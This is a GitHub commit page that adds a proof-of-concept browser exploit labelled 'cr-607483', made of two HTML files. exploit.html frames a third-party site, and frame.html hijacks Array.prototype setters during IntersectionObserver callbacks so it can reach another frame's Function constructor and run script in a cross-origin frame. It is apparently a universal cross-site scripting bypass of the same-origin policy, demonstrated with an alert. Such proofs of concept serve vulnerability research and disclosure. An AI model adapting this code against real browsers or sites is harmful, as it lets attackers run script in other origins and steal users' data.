Skip to content

Commit 44b689c

Browse files
MetnewMetnew
committed
feat(chrome): add cr-607483
1 parent a714a22 commit 44b689c

File tree

2 files changed

+145
-0
lines changed

2 files changed

+145
-0
lines changed

chrome/cr-607483/exploit.html

+19
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
<script>
2+
if (location.protocol == 'file:') {
3+
throw alert('HTTP server is required.');
4+
}
5+
6+
var i1 = document.documentElement.appendChild(document.createElement('iframe'));
7+
var i2 = document.documentElement.appendChild(document.createElement('iframe'));
8+
i1.onload = i2.onload = f;
9+
i1.width = i1.height = "90%";
10+
i2.width = i2.height = "0";
11+
i1.src = i2.src = '//docs.oracle.com/javase/8/docs/api/index.html';
12+
13+
var c = 0;
14+
function f() {
15+
if (++c == 2) {
16+
frames[0][0].location = 'frame.html';
17+
}
18+
}
19+
</script>

chrome/cr-607483/frame.html

+126
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,126 @@
1+
<script>
2+
3+
var t = top;
4+
5+
onload = function () {
6+
7+
var io = new IntersectionObserver(function () {}, {});
8+
9+
io.observe(document.getElementById("o1"));
10+
io.observe(document.getElementById("o2"));
11+
12+
Object.defineProperty(Array.prototype, "0", {
13+
get: function () {},
14+
set: function (v) {
15+
var a = document.createElement('a');
16+
a.href = 'about:blank';
17+
a.click();
18+
t.i1.remove();
19+
}
20+
});
21+
22+
Object.defineProperty(Array.prototype, "1", {
23+
get: function () {},
24+
set: function () {
25+
arguments[0].constructor.constructor('w', 'w.alert(w.location);')(t.frames[0]);
26+
}
27+
});
28+
29+
document.getElementById("o2").scrollIntoView();
30+
31+
};
32+
33+
</script>
34+
<p>Filler</p>
35+
<p>Filler</p>
36+
<p>Filler</p>
37+
<p>Filler</p>
38+
<p>Filler</p>
39+
<p>Filler</p>
40+
<p>Filler</p>
41+
<p>Filler</p>
42+
<p>Filler</p>
43+
<p>Filler</p>
44+
<p>Filler</p>
45+
<p>Filler</p>
46+
<p>Filler</p>
47+
<p>Filler</p>
48+
<p>Filler</p>
49+
<p>Filler</p>
50+
<p>Filler</p>
51+
<p>Filler</p>
52+
<p>Filler</p>
53+
<p>Filler</p>
54+
<p>Filler</p>
55+
<p>Filler</p>
56+
<p>Filler</p>
57+
<p>Filler</p>
58+
<p>Filler</p>
59+
<p>Filler</p>
60+
<p>Filler</p>
61+
<p>Filler</p>
62+
<p>Filler</p>
63+
<p>Filler</p>
64+
<p>Filler</p>
65+
<p>Filler</p>
66+
<p>Filler</p>
67+
<p>Filler</p>
68+
<p>Filler</p>
69+
<p>Filler</p>
70+
<p>Filler</p>
71+
<p>Filler</p>
72+
<p>Filler</p>
73+
<p>Filler</p>
74+
<p>Filler</p>
75+
<p>Filler</p>
76+
<p>Filler</p>
77+
<p>Filler</p>
78+
<p>Filler</p>
79+
<p>Filler</p>
80+
<p>Filler</p>
81+
<p>Filler</p>
82+
<p>Filler</p>
83+
<p>Filler</p>
84+
<p>Filler</p>
85+
<p>Filler</p>
86+
<p>Filler</p>
87+
<p>Filler</p>
88+
<p>Filler</p>
89+
<p>Filler</p>
90+
<p>Filler</p>
91+
<p>Filler</p>
92+
<p>Filler</p>
93+
<p>Filler</p>
94+
<p>Filler</p>
95+
<p>Filler</p>
96+
<p>Filler</p>
97+
<p>Filler</p>
98+
<p>Filler</p>
99+
<p>Filler</p>
100+
<p>Filler</p>
101+
<p>Filler</p>
102+
<p>Filler</p>
103+
<p>Filler</p>
104+
<p>Filler</p>
105+
<p>Filler</p>
106+
<p>Filler</p>
107+
<p>Filler</p>
108+
<p>Filler</p>
109+
<p>Filler</p>
110+
<p>Filler</p>
111+
<p>Filler</p>
112+
<p>Filler</p>
113+
<p>Filler</p>
114+
<p>Filler</p>
115+
<p>Filler</p>
116+
<p>Filler</p>
117+
<p>Filler</p>
118+
<p>Filler</p>
119+
<p>Filler</p>
120+
<p>Filler</p>
121+
<p>Filler</p>
122+
<p>Filler</p>
123+
<p>Filler</p>
124+
<p>Filler</p>
125+
<div id=o1>Observed</div>
126+
<div id=o2>Observed</div>

0 commit comments

Comments
 (0)